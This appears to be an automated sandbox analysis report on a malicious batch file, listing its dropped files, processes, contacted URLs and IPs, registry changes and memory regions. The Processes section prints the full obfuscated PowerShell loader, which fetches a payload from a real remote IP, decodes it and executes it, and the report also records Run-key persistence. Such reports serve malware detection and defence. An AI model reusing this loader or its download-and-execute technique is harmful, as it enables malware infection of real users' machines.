Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Doc_004024024001.bat
|
ASCII text, with very long lines (3300), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bc32zhws.imz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fy3mpi5u.ni3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocinpzcp.ykt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkjrsfcx.y4n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\s5497I81
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5XGY2TGM0TXXOAVV8K1P.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Stregmaalene.Dis
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Doc_004024024001.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Slvtjsskabets3 = 1;$Adoptionsbevillingers='S';$Adoptionsbevillingers+='ubstrin';$Adoptionsbevillingers+='g';Function
Takilman203($Prefade){$Unconversable=$Prefade.Length-$Slvtjsskabets3;For($Magnetometrical=1; $Magnetometrical -lt $Unconversable;
$Magnetometrical+=(2)){$Cardsharping+=$Prefade.$Adoptionsbevillingers.Invoke($Magnetometrical, $Slvtjsskabets3);}$Cardsharping;}function
Roebling($Unmotivatedly){& ($Opmuntringernes) ($Unmotivatedly);}$Glatslebnes=Takilman203 ' M o,zHiSl l,a /F5m.B0G (GWTiInId,o
w.sM NfT, 1S0C.,0G;P HWSi,n,6V4 ; Px 6V4S;S .rVvB:L1D2C1N.U0 ). G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWfCoFx./,1,2R1 .
0A ';$Butikshandlerne=Takilman203 ' U,s e.r - A gUeMnKt ';$Winterfeeding=Takilman203 ',h.tLt,pT:C/,/S8F7 . 1 2 1D..1 0N5N.B1
6A3S/SPSu nDkDt e,t..,hShIp. ';$Lessoning=Takilman203 '.>S ';$Opmuntringernes=Takilman203 'Ki e xP ';$Farvefabrikkerne='Overbrained';Roebling
(Takilman203 'bS,eitH-SC o n.t e n.t K-DPUa,tNh, TT,: \.C.hoi s e lAi n.g sI.Gt xDt - V aOlFuSei $,FUa r v eDfFaIbjrDiDk.k.e
rLn eT;S ');Roebling (Takilman203 '.i,f. T(,tSe sctu-kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP..tWxStK) {EeUx i t } ;W ');$Electriceel
= Takilman203 ' eEcPhOoV %,anp,pRd aGtHar% \BS t rKeCg mGa.aUlRe nRe .GDUiTsr &S&k Ae c,h.o. v$ ';Roebling (Takilman203
',$ g lroBb aSlK: R uHbHiMcGoWn = (.cTmSdR A/ScD $IERl e,cet,r iPc.e e lF)V ');Roebling (Takilman203 ' $,gEl oAb aUlH:KGGaIrAa
n.tAsT=.$AW i n.tSeErFfRe eAd,iTn g..OsHp l,i tB(S$ L ePsUsSo.nSi nDgU)N ');$Winterfeeding=$Garants[0];Roebling (Takilman203
' $Bg l oFbsaFl :DFAiFn,gAe r vPaHnCtPeRn.= N,eIwe- OKbMjMeCc.t BSMy s.tGePmH.,NueAt,. W.eLb.C.lBiCe,nCtB ');Roebling (Takilman203
'G$NF.i nPgHe rUv aTnstNeWn . HPe a dKe rus [ $EBSu tRiDkSsAhSa n dLl,errRn e ]R=I$TG l a.t s l eSb nMe,si ');$Formatlinietegnets=Takilman203
' FMi,nFgLe rSv a nBt.eunC.HDFoNw n lSoFaMdWFBi.lTeP(.$AWFiMnOt,eHrEfWeFe dii n,gP,E$FDPuKblbFiKnA)P ';$Formatlinietegnets=$Rubicon[1]+$Formatlinietegnets;$Dubbin=$Rubicon[0];Roebling
(Takilman203 'M$ g l,oKb,aVls:,BUeSgMy.nDdPe rGk,o.nMs,t,r,uMkRt iCo n 4 1U=I(.T.e,sHtO-APPa tFhS .$BDvu.bAb.i nI) ');while
(!$Begynderkonstruktion41) {Roebling (Takilman203 ',$ gSl oBb aClP:.m aTr.iJn e s,tpa toiFoFnRe rPn.e s =B$ftJr uFe ') ;Roebling
$Formatlinietegnets;Roebling (Takilman203 'US.tLaSr tF- SMlBe.e,p K4D ');Roebling (Takilman203 'Y$,g lMobb a,lF: BFe g yTnKd.e
rBkPo,nvsSt.rGutk.t,i,o.n 4B1,=I( T e s tA-.PSaSt,hM S$ DLuBbMb i n )I ') ;Roebling (Takilman203 ',$HgUlCo.b,a lT: CIaHr eReMnF=
$MgflboAbNaOls:bt.iUl r.e.gPnLeRt,+f+B%s$SG.aDrSa nPt sB. c oIu,nDt ') ;$Winterfeeding=$Garants[$Careen];}Roebling (Takilman203
' $,gClBo,bSaMl,:BATkHt iLoUn sDe.nShGe dke.nNs, G=s GCeUtG-SCdo n tSe,n tS $GD,u.b b,i nS ');Roebling (Takilman203 'F$AgMlMo
b a.l : HSeSaUd m,e n. ,= [ S,y.sNt eEmT.,C osnNv eHrHt ] :,:,FUr o muB aSsEe 6,4GS t,r.itnfgU( $,AEkst i oAn,s,eBn,h e
dUe nBs )U ');Roebling (Takilman203 'B$Kg lRo,b,aPlM:KLPn.n i nMgBs.d.a gLe,n. R=, ,[,SRy.s t,e,mS.DTCe xDtO. EMn csofd.i,nSg
] : : A S C IPI .MG e.tRS.t.r,i n gD( $SHBeJa d.mLeEn ) ');Roebling (Takilman203 'S$.g l o,bPaRl :SR e n u.mCm e,rKeSrKePdceBsB=
$sLBn,n,ipnag s d aDg eBn..,s u b s,tTrPi nPg (G2.7,5.3P9 0N,H2 6 5 4 1 )V ');Roebling $Renummereredes;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stregmaalene.Dis && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Slvtjsskabets3 = 1;$Adoptionsbevillingers='S';$Adoptionsbevillingers+='ubstrin';$Adoptionsbevillingers+='g';Function
Takilman203($Prefade){$Unconversable=$Prefade.Length-$Slvtjsskabets3;For($Magnetometrical=1; $Magnetometrical -lt $Unconversable;
$Magnetometrical+=(2)){$Cardsharping+=$Prefade.$Adoptionsbevillingers.Invoke($Magnetometrical, $Slvtjsskabets3);}$Cardsharping;}function
Roebling($Unmotivatedly){& ($Opmuntringernes) ($Unmotivatedly);}$Glatslebnes=Takilman203 ' M o,zHiSl l,a /F5m.B0G (GWTiInId,o
w.sM NfT, 1S0C.,0G;P HWSi,n,6V4 ; Px 6V4S;S .rVvB:L1D2C1N.U0 ). G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWfCoFx./,1,2R1 .
0A ';$Butikshandlerne=Takilman203 ' U,s e.r - A gUeMnKt ';$Winterfeeding=Takilman203 ',h.tLt,pT:C/,/S8F7 . 1 2 1D..1 0N5N.B1
6A3S/SPSu nDkDt e,t..,hShIp. ';$Lessoning=Takilman203 '.>S ';$Opmuntringernes=Takilman203 'Ki e xP ';$Farvefabrikkerne='Overbrained';Roebling
(Takilman203 'bS,eitH-SC o n.t e n.t K-DPUa,tNh, TT,: \.C.hoi s e lAi n.g sI.Gt xDt - V aOlFuSei $,FUa r v eDfFaIbjrDiDk.k.e
rLn eT;S ');Roebling (Takilman203 '.i,f. T(,tSe sctu-kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP..tWxStK) {EeUx i t } ;W ');$Electriceel
= Takilman203 ' eEcPhOoV %,anp,pRd aGtHar% \BS t rKeCg mGa.aUlRe nRe .GDUiTsr &S&k Ae c,h.o. v$ ';Roebling (Takilman203
',$ g lroBb aSlK: R uHbHiMcGoWn = (.cTmSdR A/ScD $IERl e,cet,r iPc.e e lF)V ');Roebling (Takilman203 ' $,gEl oAb aUlH:KGGaIrAa
n.tAsT=.$AW i n.tSeErFfRe eAd,iTn g..OsHp l,i tB(S$ L ePsUsSo.nSi nDgU)N ');$Winterfeeding=$Garants[0];Roebling (Takilman203
' $Bg l oFbsaFl :DFAiFn,gAe r vPaHnCtPeRn.= N,eIwe- OKbMjMeCc.t BSMy s.tGePmH.,NueAt,. W.eLb.C.lBiCe,nCtB ');Roebling (Takilman203
'G$NF.i nPgHe rUv aTnstNeWn . HPe a dKe rus [ $EBSu tRiDkSsAhSa n dLl,errRn e ]R=I$TG l a.t s l eSb nMe,si ');$Formatlinietegnets=Takilman203
' FMi,nFgLe rSv a nBt.eunC.HDFoNw n lSoFaMdWFBi.lTeP(.$AWFiMnOt,eHrEfWeFe dii n,gP,E$FDPuKblbFiKnA)P ';$Formatlinietegnets=$Rubicon[1]+$Formatlinietegnets;$Dubbin=$Rubicon[0];Roebling
(Takilman203 'M$ g l,oKb,aVls:,BUeSgMy.nDdPe rGk,o.nMs,t,r,uMkRt iCo n 4 1U=I(.T.e,sHtO-APPa tFhS .$BDvu.bAb.i nI) ');while
(!$Begynderkonstruktion41) {Roebling (Takilman203 ',$ gSl oBb aClP:.m aTr.iJn e s,tpa toiFoFnRe rPn.e s =B$ftJr uFe ') ;Roebling
$Formatlinietegnets;Roebling (Takilman203 'US.tLaSr tF- SMlBe.e,p K4D ');Roebling (Takilman203 'Y$,g lMobb a,lF: BFe g yTnKd.e
rBkPo,nvsSt.rGutk.t,i,o.n 4B1,=I( T e s tA-.PSaSt,hM S$ DLuBbMb i n )I ') ;Roebling (Takilman203 ',$HgUlCo.b,a lT: CIaHr eReMnF=
$MgflboAbNaOls:bt.iUl r.e.gPnLeRt,+f+B%s$SG.aDrSa nPt sB. c oIu,nDt ') ;$Winterfeeding=$Garants[$Careen];}Roebling (Takilman203
' $,gClBo,bSaMl,:BATkHt iLoUn sDe.nShGe dke.nNs, G=s GCeUtG-SCdo n tSe,n tS $GD,u.b b,i nS ');Roebling (Takilman203 'F$AgMlMo
b a.l : HSeSaUd m,e n. ,= [ S,y.sNt eEmT.,C osnNv eHrHt ] :,:,FUr o muB aSsEe 6,4GS t,r.itnfgU( $,AEkst i oAn,s,eBn,h e
dUe nBs )U ');Roebling (Takilman203 'B$Kg lRo,b,aPlM:KLPn.n i nMgBs.d.a gLe,n. R=, ,[,SRy.s t,e,mS.DTCe xDtO. EMn csofd.i,nSg
] : : A S C IPI .MG e.tRS.t.r,i n gD( $SHBeJa d.mLeEn ) ');Roebling (Takilman203 'S$.g l o,bPaRl :SR e n u.mCm e,rKeSrKePdceBsB=
$sLBn,n,ipnag s d aDg eBn..,s u b s,tTrPi nPg (G2.7,5.3P9 0N,H2 6 5 4 1 )V ');Roebling $Renummereredes;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe
|
"C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe"
|
|
|
|
C:\Windows\SysWOW64\AtBroker.exe
|
"C:\Windows\SysWOW64\AtBroker.exe"
|
|
|
|
C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe
|
"C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stregmaalene.Dis && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 5 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.microsoft.coe
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://87.121.105.163/Punktet.hhpP
|
unknown
|
||
|
http://87.121.H:
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.163
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://87.121.105.163/Punktet.hhp
|
87.121.105.163
|
||
|
http://87.121.105.163/Punktet.hhpXR
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.105.163/TjtonPwEiP175.bin
|
87.121.105.163
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.megabet303.lol
|
unknown
|
|
|
|
www.oyoing.com
|
127.0.0.1
|
||
|
www.tyaer.com
|
47.91.88.207
|
||
|
www.theplays.shop
|
172.67.152.117
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
87.121.105.163
|
unknown
|
Bulgaria
|
||
|
127.0.0.1
|
www.oyoing.com
|
unknown
|
||
|
47.91.88.207
|
www.tyaer.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
PX5H4
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 12 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2D10000
|
unclassified section
|
page execute and read and write
|
|
|
|
570000
|
system
|
page execute and read and write
|
|
|
|
5BA2000
|
trusted library allocation
|
page read and write
|
|
|
|
252F0000
|
unclassified section
|
page execute and read and write
|
|
|
|
3C00000
|
unkown
|
page execute and read and write
|
|
|
|
A10000
|
trusted library allocation
|
page read and write
|
|
|
|
4F70000
|
system
|
page execute and read and write
|
|
|
|
8830000
|
direct allocation
|
page execute and read and write
|
|
|
|
1C0B94F1000
|
trusted library allocation
|
page read and write
|
|
|
|
9228000
|
direct allocation
|
page execute and read and write
|
|
|
|
A50000
|
trusted library allocation
|
page read and write
|
|
|
|
2DC0000
|
trusted library section
|
page read and write
|
||
|
1C0C18AC000
|
heap
|
page read and write
|
||
|
1C0C164C000
|
heap
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
30C3000
|
heap
|
page read and write
|
||
|
561000
|
unkown
|
page execute read
|
||
|
F0229CD000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BA74FFE000
|
stack
|
page read and write
|
||
|
18843FA5000
|
trusted library allocation
|
page read and write
|
||
|
AB1000
|
unkown
|
page readonly
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
8663000
|
heap
|
page read and write
|
||
|
2CFD000
|
stack
|
page read and write
|
||
|
BA7553E000
|
unkown
|
page read and write
|
||
|
6DAE000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0AB2B8000
|
trusted library allocation
|
page read and write
|
||
|
1C0C1667000
|
heap
|
page read and write
|
||
|
8250000
|
trusted library allocation
|
page read and write
|
||
|
D828000
|
direct allocation
|
page execute and read and write
|
||
|
1C0A9CC5000
|
trusted library allocation
|
page read and write
|
||
|
575000
|
unkown
|
page read and write
|
||
|
2B05000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A950B000
|
trusted library allocation
|
page read and write
|
||
|
7FE0000
|
heap
|
page read and write
|
||
|
C0D000
|
heap
|
page read and write
|
||
|
4E1F000
|
stack
|
page read and write
|
||
|
2367E000
|
stack
|
page read and write
|
||
|
2D10000
|
direct allocation
|
page read and write
|
||
|
774D000
|
stack
|
page read and write
|
||
|
800000
|
unkown
|
page readonly
|
||
|
30AE000
|
heap
|
page read and write
|
||
|
6F30000
|
direct allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
188422D0000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7A6F000
|
heap
|
page read and write
|
||
|
1C0A9E50000
|
trusted library allocation
|
page read and write
|
||
|
564C000
|
stack
|
page read and write
|
||
|
63D8000
|
remote allocation
|
page execute and read and write
|
||
|
188421B0000
|
heap
|
page read and write
|
||
|
577000
|
unkown
|
page readonly
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
7F1E000
|
stack
|
page read and write
|
||
|
6E2E000
|
stack
|
page read and write
|
||
|
7F60000
|
heap
|
page read and write
|
||
|
235CE000
|
stack
|
page read and write
|
||
|
BD7000
|
heap
|
page read and write
|
||
|
1C0B94A1000
|
trusted library allocation
|
page read and write
|
||
|
18843E03000
|
trusted library allocation
|
page read and write
|
||
|
4604000
|
heap
|
page read and write
|
||
|
8220000
|
direct allocation
|
page read and write
|
||
|
1C0AA863000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
BA754FC000
|
stack
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
8810000
|
trusted library allocation
|
page read and write
|
||
|
1884230D000
|
heap
|
page read and write
|
||
|
1C0C16B0000
|
heap
|
page read and write
|
||
|
56E000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
23EF0000
|
unclassified section
|
page execute and read and write
|
||
|
8217000
|
stack
|
page read and write
|
||
|
1C0C1684000
|
heap
|
page read and write
|
||
|
5A0000
|
unkown
|
page readonly
|
||
|
4C62000
|
unclassified section
|
page read and write
|
||
|
7FD3000
|
heap
|
page read and write
|
||
|
455E000
|
unkown
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
55CF000
|
stack
|
page read and write
|
||
|
AC0000
|
unkown
|
page read and write
|
||
|
70FD000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2710000
|
unkown
|
page readonly
|
||
|
2873000
|
unkown
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
2770000
|
unkown
|
page readonly
|
||
|
560000
|
unkown
|
page readonly
|
||
|
1C0C181F000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
2DB7000
|
heap
|
page read and write
|
||
|
2AAA000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
6F20000
|
direct allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
4792000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4780000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
482E000
|
stack
|
page read and write
|
||
|
1C0B977A000
|
trusted library allocation
|
page read and write
|
||
|
7485000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4790000
|
trusted library allocation
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0C17A3000
|
heap
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BA28000
|
direct allocation
|
page execute and read and write
|
||
|
31D8000
|
remote allocation
|
page execute and read and write
|
||
|
2C48000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
81E0000
|
direct allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2660000
|
heap
|
page read and write
|
||
|
45D8000
|
remote allocation
|
page execute and read and write
|
||
|
B40000
|
unkown
|
page readonly
|
||
|
30B6000
|
heap
|
page read and write
|
||
|
9A0000
|
unkown
|
page readonly
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
950000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
25C4E000
|
unclassified section
|
page execute and read and write
|
||
|
2BABAE40000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
56E000
|
unkown
|
page readonly
|
||
|
303E000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
74AE000
|
heap
|
page read and write
|
||
|
7FD7000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
6FFA000
|
stack
|
page read and write
|
||
|
23CC9000
|
direct allocation
|
page execute and read and write
|
||
|
2354E000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
73C7000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7A81000
|
heap
|
page read and write
|
||
|
1C0C1797000
|
heap
|
page execute and read and write
|
||
|
F022CFF000
|
unkown
|
page read and write
|
||
|
27EE000
|
stack
|
page read and write
|
||
|
74A5000
|
heap
|
page read and write
|
||
|
7A75000
|
heap
|
page read and write
|
||
|
561000
|
unkown
|
page execute read
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
1C0A9E42000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
4B1D000
|
direct allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
79F9000
|
heap
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0C15D6000
|
heap
|
page read and write
|
||
|
8440000
|
trusted library allocation
|
page execute and read and write
|
||
|
8415000
|
trusted library allocation
|
page read and write
|
||
|
82BE000
|
stack
|
page read and write
|
||
|
2BABB014000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
85F0000
|
heap
|
page read and write
|
||
|
4770000
|
trusted library allocation
|
page read and write
|
||
|
23B90000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
46BE000
|
stack
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
1C0A75E5000
|
heap
|
page read and write
|
||
|
7627000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4CBC000
|
unclassified section
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0C1790000
|
heap
|
page execute and read and write
|
||
|
1C0C1690000
|
heap
|
page read and write
|
||
|
81AF000
|
stack
|
page read and write
|
||
|
2D10000
|
direct allocation
|
page read and write
|
||
|
3120000
|
trusted library section
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2350F000
|
stack
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
1C0AB31E000
|
trusted library allocation
|
page read and write
|
||
|
AF5000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
8860000
|
direct allocation
|
page read and write
|
||
|
1C0A96AA000
|
trusted library allocation
|
page read and write
|
||
|
8250000
|
direct allocation
|
page read and write
|
||
|
27A0000
|
heap
|
page read and write
|
||
|
6F70000
|
direct allocation
|
page read and write
|
||
|
4F89000
|
trusted library allocation
|
page read and write
|
||
|
595E000
|
unkown
|
page execute and read and write
|
||
|
4900000
|
heap
|
page read and write
|
||
|
18843E10000
|
trusted library allocation
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
BA7537D000
|
stack
|
page read and write
|
||
|
4FC0000
|
heap
|
page read and write
|
||
|
5959000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
2D19000
|
heap
|
page read and write
|
||
|
1884211C000
|
system
|
page execute and read and write
|
||
|
970000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4C80000
|
heap
|
page read and write
|
||
|
